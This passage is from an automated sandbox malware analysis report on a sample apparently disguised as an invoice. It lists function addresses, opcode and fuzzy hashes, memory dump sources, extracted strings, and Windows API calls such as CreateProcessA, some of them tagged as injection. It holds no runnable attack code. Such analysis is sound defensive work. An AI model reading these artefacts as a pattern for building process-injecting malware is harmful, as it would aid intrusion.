Opcode Fuzzy Hash: c73b8338e8be2a27950630fec3d13c4135fe840d12be90d288a42c4297e58496
Instruction Fuzzy Hash: BB012B7100C3549AE7144F19ECC4B66FFACDF91324F18D41AFE495A182C6B89C80DA71

Uniqueness

Uniqueness Score: -1.00%

Function 00E10750 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b9cff1ea9f4884b4504dc5f08bdcc2ac8df34f03e2e2ca556e891754576c97
Instruction ID: d4d3b7ac3a49e5854aef23eac6f2bd19cfbd02e971dd68a7f9303341b9610cb3
Opcode Fuzzy Hash: a1b9cff1ea9f4884b4504dc5f08bdcc2ac8df34f03e2e2ca556e891754576c97
Instruction Fuzzy Hash: 3C1103B58002488FCB10DF9AC585BDEFBF4EB48324F24841AD519A7340C375A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0669C7F0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55aa2b7ec806419c9d922a1de3dd14f1ff4495831101dc905f31b70f9a7d7a6a
Instruction ID: d2b9f681575b8f2f08fa69d9d4e670789b66a42aa2f599ce6d04d74e2b9a591d
Opcode Fuzzy Hash: 55aa2b7ec806419c9d922a1de3dd14f1ff4495831101dc905f31b70f9a7d7a6a
Instruction Fuzzy Hash: CBF02436A20224A7CB2456B9E8019DE773DE780330F00456AED20FB380EA626811C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E10E94 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0cc2e9fcc9f54ae150c185b8397a9440ec9f2f7f89838ac28b7e41e69ea50a
Instruction ID: dbe4b4a7ba9881c7df6fed233de0f4d79432c08ce728f86a7acafc11c369f36b
Opcode Fuzzy Hash: 7b0cc2e9fcc9f54ae150c185b8397a9440ec9f2f7f89838ac28b7e41e69ea50a
Instruction Fuzzy Hash: AC011E70904219DFDB25CF6AC4043EE7FB1BF49314F148669E414AA194D7B54AC5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E10F31 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6a91df89b30133d4ed4f9042cbe561f7616661491432038c0d595adc235f67
Instruction ID: 74687d531f52f9008b0fc0847bbe123c052f5be8f2fcf8de0a6d54033b92f10b
Opcode Fuzzy Hash: ba6a91df89b30133d4ed4f9042cbe561f7616661491432038c0d595adc235f67
Instruction Fuzzy Hash: EDF0E9357082445FC7018B6A9C80D9BBFF9EFD6220B1540AFE044D7362C5B45C05C760

Uniqueness

Uniqueness Score: -1.00%

Function 00E2D8C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151862207.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e2d000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0ea779d689911f3de34b35817d4d3599dcf7846783ff3113f9ef5927d321a9
Instruction ID: 7d4f036f9d0ea8423ff9177a4e1ae0b1216a4f014ffaa2a32292121a8c2b20f7
Opcode Fuzzy Hash: de0ea779d689911f3de34b35817d4d3599dcf7846783ff3113f9ef5927d321a9
Instruction Fuzzy Hash: A1F0C8714083449EE7108F05DCC4B62FF98DB91324F14C45AFD485B286C2786C40CA70

Uniqueness

Uniqueness Score: -1.00%

Function 00E10EA0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f0f8d79b1641e4f89052a53d3dff630e8b5c017053ec9f0a125e59a1affea88
Instruction ID: 905ff674f1802e7c549825625c32687c908447e545eb26568da52b1942c15dd7
Opcode Fuzzy Hash: 1f0f8d79b1641e4f89052a53d3dff630e8b5c017053ec9f0a125e59a1affea88
Instruction Fuzzy Hash: 1101FB70900219DFDF24DF6AC4053EEBAF1BF48354F208629E424AA294D7B55AC1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E10F81 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca313256357665f07bc8e66e7bc08732865b4bee3f5d26054641db39979c76b6
Instruction ID: 0042dd0836e35129b04fb376a3c103cf42592c01a108a0312c8c8d1565f7c154
Opcode Fuzzy Hash: ca313256357665f07bc8e66e7bc08732865b4bee3f5d26054641db39979c76b6
Instruction Fuzzy Hash: 70F06D353093405FC3118B5BDC84D46BFA9EF8E721B1580ABF549DB3A2C961AC05C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00E10F40 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f79928f2f2d11940bc9ed917612cf8e6a444ac794789d1a662479ffb70f3eb
Instruction ID: 6736f3a8b15845888252cf51e88d7ccb011eeb2a79a5d84b69823e3bfb1e694a
Opcode Fuzzy Hash: 53f79928f2f2d11940bc9ed917612cf8e6a444ac794789d1a662479ffb70f3eb
Instruction Fuzzy Hash: 9CE06D727002186FD3049A5E9C40E6BFBEDEFD9720B21806AF504D7361CAB0AC0086A4

Uniqueness

Uniqueness Score: -1.00%

Function 00E11251 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b42715af93186bf26646fbe36b950a948d48b2d310cc93d7abc1b1020e68d9
Instruction ID: 1f01fba8491ef7bc632e46f7acdb97a9dbfc0043391a81ccab8c04470bd010cb
Opcode Fuzzy Hash: b7b42715af93186bf26646fbe36b950a948d48b2d310cc93d7abc1b1020e68d9
Instruction Fuzzy Hash: CCF0F9B0D0434A9FDB54DFA9C845AAEBFF4AB08300F1048AAD614F7250D7749641DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E11260 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88d6fcee16060b4b58e091317ecc3f7a843ebd7ac78a40a44fa1a99c12b91fa
Instruction ID: 258dc264420eaa58d669f86bc02e6e767a6ffc8c2deec842d8b0902d006ff11f
Opcode Fuzzy Hash: b88d6fcee16060b4b58e091317ecc3f7a843ebd7ac78a40a44fa1a99c12b91fa
Instruction Fuzzy Hash: 77F0DAB0D0430A9FDB44DFA9D841AAEBBF4BB48304F5045AAE618E7250D7759540CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E111F7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0776d87d38edded2b4cd2e86b8d79d47a027686a3432f98d6dc1c63d011b698
Instruction ID: 452579ca34b19a92ca391715665df72f62d1da1e92106cedd8854f18674f797d
Opcode Fuzzy Hash: a0776d87d38edded2b4cd2e86b8d79d47a027686a3432f98d6dc1c63d011b698
Instruction Fuzzy Hash: BEF015B0904309DFD780DF69C944A8ABBF0AF09714F2584A9C554E7221D7709A85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E10F90 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5454ff676f05ee9fd95da8a9d2476790810088fd829bd83d7bdbbe4fef60db7b
Instruction ID: 7dbfcfa636d8452ef35d72ecd8eb04ceeb61cdbca1a0e8151e1b1e9e2c4f91ef
Opcode Fuzzy Hash: 5454ff676f05ee9fd95da8a9d2476790810088fd829bd83d7bdbbe4fef60db7b
Instruction Fuzzy Hash: 8CE0EC363046146FC3149A4FEC88D46FBADFFC9771B55806AFA0AC7361CA71AC05C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 00E112EF Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d05cdbe9c0222cf24ea7a2b9d398f133891856b73b1169c2e175f98aaa190548
Instruction ID: 22289bcc60def76330af0d1d6d5a386c6830e2c5730e95787536929a1198f84a
Opcode Fuzzy Hash: d05cdbe9c0222cf24ea7a2b9d398f133891856b73b1169c2e175f98aaa190548
Instruction Fuzzy Hash: 84E08C3210D3885FCB13DBE4AC108823FF96F16304709C0E3EA84CB063DA219858D766

Uniqueness

Uniqueness Score: -1.00%

Function 00E11208 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce4180a67282d5e0bae0a53ec080f2031c7bdca9ab88a520a8221e92e75814e
Instruction ID: 521f0f2ef7f1753366118b71e371fc47943b0ef07144aad500e216b0e3292fc9
Opcode Fuzzy Hash: 6ce4180a67282d5e0bae0a53ec080f2031c7bdca9ab88a520a8221e92e75814e
Instruction Fuzzy Hash: 2EE092B0D40209DFD740EFA9C905A9EBBF0BB08700F2185A9D119E7261E77496459F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 066976C0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$fq, xrefs: 066977E1
$fq, xrefs: 06697C18
$fq, xrefs: 06697B6D
$fq, xrefs: 066977B0
$fq, xrefs: 06697C22
$fq, xrefs: 06697B79
$fq, xrefs: 06697C0C
$fq, xrefs: 066977ED
$fq, xrefs: 066977BC
$fq, xrefs: 06697C2E

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1462074617
Opcode ID: 9e593142c1010812000b6066a618f6839b4700c5dd5c050e27881466a0a3c1ed
Instruction ID: ad0f2f7e906744416998d99e6a7d990507aa8bdaf84d553ac06cd38b089b19ac
Opcode Fuzzy Hash: 9e593142c1010812000b6066a618f6839b4700c5dd5c050e27881466a0a3c1ed
Instruction Fuzzy Hash: 0E122B30A11219CFDF68DF65C994A9EBBB6FF88300F2485A9D405AB355DB309D45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0669A958 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$fq, xrefs: 0669AB0A
$fq, xrefs: 0669AAA9
$fq, xrefs: 0669AAE0
$fq, xrefs: 0669AAB5
$fq, xrefs: 0669AB16
$fq, xrefs: 0669AA4E
$fq, xrefs: 0669AAD4
$fq, xrefs: 0669AA5A

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-3929485403
Opcode ID: 321f9b13c47d653047eab0c6f57c96da661654d115acb9bc41f42b9ebf726465
Instruction ID: 503da20c01812e71bee6ed2ea84ea2065e190528801961cee3b9e8e839b274b3
Opcode Fuzzy Hash: 321f9b13c47d653047eab0c6f57c96da661654d115acb9bc41f42b9ebf726465
Instruction Fuzzy Hash: DB915E30A10209DFDF65DFA4D695B6E77FAEF84304F248529E801AB394DB349D42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 066970C0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$fq, xrefs: 066975D4
$fq, xrefs: 066975C8
$fq, xrefs: 066973A2
$fq, xrefs: 06697408
.5~q, xrefs: 0669711B
$fq, xrefs: 066973FC
$fq, xrefs: 0669755C

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: .5~q$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1301248726
Opcode ID: 82fbfab5beff2ca24d2fb96dae7a98f21b38c56b3d6211a736711d9176a1e2ab
Instruction ID: e66fc814c7ea6f1843cb69c8e4063529726af53896eacb8d9b8066b8cb0d5479
Opcode Fuzzy Hash: 82fbfab5beff2ca24d2fb96dae7a98f21b38c56b3d6211a736711d9176a1e2ab
Instruction Fuzzy Hash: F6F15030B11209CFDB55EFA5D594A6EBBB6FF84300F248569D805AB3A9DF319C42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0669BA28 Relevance: 7.7, Strings: 6, Instructions: 197COMMON

Download Yara Rule

Strings

$fq, xrefs: 0669BC03
$fq, xrefs: 0669BB9B
$fq, xrefs: 0669BC0F
$fq, xrefs: 0669BBCF
$fq, xrefs: 0669BBA7
$fq, xrefs: 0669BBDB

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1582559945
Opcode ID: c3fe56e6b423f300c83ea4346262037cea4983c9ea474b4bed5b741c93eafe5b
Instruction ID: 293d603f04efd4b5744db46e612ef47938e122da831ad3000de2c3f2dba38d2e
Opcode Fuzzy Hash: c3fe56e6b423f300c83ea4346262037cea4983c9ea474b4bed5b741c93eafe5b
Instruction Fuzzy Hash: 2A718F70E10219CFDF58DFA8E59066EB7BAFF84310B104469D8069B394DF709D46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 066983F8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$fq, xrefs: 06698652
$fq, xrefs: 066986B7
$fq, xrefs: 066986C3
$fq, xrefs: 0669865E

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: 041b45fa6d016544294ac4e8215b127de23977188e4de301680fb14ea62f1917
Instruction ID: 49a4f8864e18ae140b0f8ab3f24db6b1bf6b2c4a6dede96a882b9cd8cd6a0d20
Opcode Fuzzy Hash: 041b45fa6d016544294ac4e8215b127de23977188e4de301680fb14ea62f1917
Instruction Fuzzy Hash: DCB15B30A012188FDF54EBB5D59466EB7B6EF85300F24886DD805AB399DB74EC82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06698810 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LRfq, xrefs: 06698952
LRfq, xrefs: 06698903
$fq, xrefs: 0669888F
$fq, xrefs: 0669889B

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: LRfq$LRfq$$fq$$fq
API String ID: 0-1810675050
Opcode ID: f8a4e5ace169361189de3b352881aea2d75ab3c5dc1cba10f27b0905c752b582
Instruction ID: d6742e889ac4d8ed6df744ad8e5ace298669c838b36878fba4191aec805a5c9b
Opcode Fuzzy Hash: f8a4e5ace169361189de3b352881aea2d75ab3c5dc1cba10f27b0905c752b582
Instruction Fuzzy Hash: 9F51A930B002059FDF58DB78D950A6A77FAFF85300F14896DE805AB3A9DA31DC41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0669ACE2 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$fq, xrefs: 0669AE93
$fq, xrefs: 0669AE11
$fq, xrefs: 0669AE64
$fq, xrefs: 0669AEBC

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: 4acec90d1b5cfbfd5a76cc2bd7de67189cf8d5c94fce9db5770df501f11505e3
Instruction ID: 1c5c91ee714bf65ed92b7b26d2ac6d354588415c70238b381254c6c0278600e5
Opcode Fuzzy Hash: 4acec90d1b5cfbfd5a76cc2bd7de67189cf8d5c94fce9db5770df501f11505e3
Instruction Fuzzy Hash: BC519130E102059FDF65DBA8D580A6EB7FAEB84310F14956AEC05EB355DB30DC42CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kaJNzBnxbXm.exePID: 7496, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	70
Total number of Limit Nodes:	3

Executed Functions

Function 00A6D368 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A6D3F6
GetCurrentThread.KERNEL32 ref: 00A6D433
GetCurrentProcess.KERNEL32 ref: 00A6D470
GetCurrentThreadId.KERNEL32 ref: 00A6D4C9

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f8d3f710c9f996d7c46b0724d0f322f1d0603f948f1e7691c037337fc98ee59b
Instruction ID: a3aa6a66ebad56cd0227418a2d216bcf57c14de25daabeda2f71e322c19a1079
Opcode Fuzzy Hash: f8d3f710c9f996d7c46b0724d0f322f1d0603f948f1e7691c037337fc98ee59b
Instruction Fuzzy Hash: 6B5176B0E002498FDB15CFA9D948BEEBBF1FF88314F24845AE009A7360CB746944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A6D378 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A6D3F6
GetCurrentThread.KERNEL32 ref: 00A6D433
GetCurrentProcess.KERNEL32 ref: 00A6D470
GetCurrentThreadId.KERNEL32 ref: 00A6D4C9

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4ae02df6c28afb51e37976c419293ee9c381c8c70e56c95c5eb8db5b9555b15b
Instruction ID: 864486cf0f7763463ae2c9dac17e4cce0e6dae19b54dc3365209860c45a8b51e
Opcode Fuzzy Hash: 4ae02df6c28afb51e37976c419293ee9c381c8c70e56c95c5eb8db5b9555b15b
Instruction Fuzzy Hash: C85137B0E006498FDB14CFAAD548B9EBBF1FF88314F24C45AE419A7360DB746944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04BE4B78 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(jq, xrefs: 04BE5A92
Hjq, xrefs: 04BE5B50

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: (jq$Hjq
API String ID: 0-2151573235
Opcode ID: 5c6e356ba5dd06813509bac47eee4d1fac08700fb95441865dc020d4a1002f64
Instruction ID: 8fe35038c464103015b4379f94dd37cbd809b9c25d2f3b7b08b1544906c68d34
Opcode Fuzzy Hash: 5c6e356ba5dd06813509bac47eee4d1fac08700fb95441865dc020d4a1002f64
Instruction Fuzzy Hash: F481C371B012089FCB14DFAAC8946BE7FF6EFC4310F1484AAE505A7391DB34AD468B94

Uniqueness

Uniqueness Score: -1.00%

Function 04BE4FA8 Relevance: 2.7, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hjq, xrefs: 04BE5070
Hjq, xrefs: 04BE50D6

Memory Dump Source

Source File: 0000000B.00000002.1758801927.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4be0000_kaJNzBnxbXm.jbxd

Similarity

API ID:
String ID: Hjq$Hjq
API String ID: 0-2395847853
Opcode ID: f67518812c470d9b532045cfaa49f35c45e59fb8d4c8bbe9347b2b683f0cc37d
Instruction ID: 544faf91035e704d674b708574b75b7219abbc9c89cc4aea975e9e12a428a518
Opcode Fuzzy Hash: f67518812c470d9b532045cfaa49f35c45e59fb8d4c8bbe9347b2b683f0cc37d
Instruction Fuzzy Hash: 8D817A71E002189FDB14DFA9C8946EEBBF2FF89300F14816AE409EB355DB749901CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C2F915 Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C2FB56

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c2d6143d66b59ba071aaee804aef0754261b40353e9b8b048f9be58c0be29376
Instruction ID: d5250e49e1cc9e39c25108c41907f2e7a391e49564beaa0a6dffebdc6cbe4814
Opcode Fuzzy Hash: c2d6143d66b59ba071aaee804aef0754261b40353e9b8b048f9be58c0be29376
Instruction Fuzzy Hash: 51A15871D0026EDFDB60DF68C841BDEBBB2BF48310F14856AE858A7240DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06C2F920 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C2FB56

Memory Dump Source

Source File: 0000000B.00000002.1760636210.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c20000_kaJNzBnxbXm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5a59b2564ebb9b2135f07eccfa9511a4e448b498e9c903e965bb0da735771eb6
Instruction ID: d84b0b409a35a5811e51086367e1064624d39e02ac2c651a3fe6652a3c45f8df
Opcode Fuzzy Hash: 5a59b2564ebb9b2135f07eccfa9511a4e448b498e9c903e965bb0da735771eb6
Instruction Fuzzy Hash: 69914871D0022EDFDB64DF68C841B9EBBB2BB48310F14856AE818A7240DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A6ACE8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A6AF3E

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 33e9f398e89e03e8a97a47db0536d68e8517c1217788fe33fa5e459b3f76f6cc
Instruction ID: f099189640326644739cd9d76b0f014f710eff5432febd7ac33b0510fac23a4e
Opcode Fuzzy Hash: 33e9f398e89e03e8a97a47db0536d68e8517c1217788fe33fa5e459b3f76f6cc
Instruction Fuzzy Hash: C88112B0A00B058FDB64DF69D04179ABBF1FF98304F10892DE58AA7A40DB75E945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00A658EC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A659A9

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 27f6f9427341e95636fc7b0755ee1b69160927c35aa85ac638028db69e56543d
Instruction ID: b6885a5e14f302d26a31995f0c72cd73509f3b3bca691199db0c240789c174bc
Opcode Fuzzy Hash: 27f6f9427341e95636fc7b0755ee1b69160927c35aa85ac638028db69e56543d
Instruction Fuzzy Hash: 7541F2B0C00719CEDB25CFA9C884BDEBBF6BF89304F20815AD449AB251DB75694ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A644E4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A659A9

Memory Dump Source

Source File: 0000000B.00000002.1749521652.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a60000_kaJNzBnxbXm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2f63afbfed69f70a86a31e3903355825c99c7f9f3a4052cefccab40562bf67e9
Instruction ID: df8a132892d810b81456a01b56d93b07c925e0520219b6c21bb36e6c20a50f90
Opcode Fuzzy Hash: 2f63afbfed69f70a86a31e3903355825c99c7f9f3a4052cefccab40562bf67e9
Instruction Fuzzy Hash: 0841DFB1C00719CEDB24CFA9C984B8EBBF5BF49304F20816AD409AB251DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06C2F690 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

